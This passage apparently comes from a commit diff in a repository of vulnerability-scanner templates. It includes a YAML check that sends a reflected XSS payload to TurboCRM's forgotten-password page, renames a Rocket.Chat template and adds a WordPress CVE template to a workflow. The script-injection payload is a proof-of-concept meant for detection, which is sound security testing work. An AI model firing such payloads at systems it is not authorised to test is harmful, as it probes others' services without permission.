reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
tags: xss,turbocrm
requests:
- method: GET
path:
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
vulnerabilities/rockethcat/unauth-message-read.yaml → vulnerabilities/rocketchat/unauth-message-read.yaml
View File

@ -45,4 +45,4 @@ requests:
- '"{\"msg\":\"result\",\"result\":{\"messages\"'
- '"success":true'
part: body
condition: and
condition: and

1
workflows/wordpress-workflow.yaml
View File

@ -14,6 +14,7 @@ workflows:
- template: cves/2016/CVE-2016-10033.yaml
- template: cves/2017/CVE-2017-1000170.yaml
- template: cves/2018/CVE-2018-3810.yaml
- template: cves/2018/CVE-2018-7422.yaml
- template: cves/2019/CVE-2019-6112.yaml
- template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml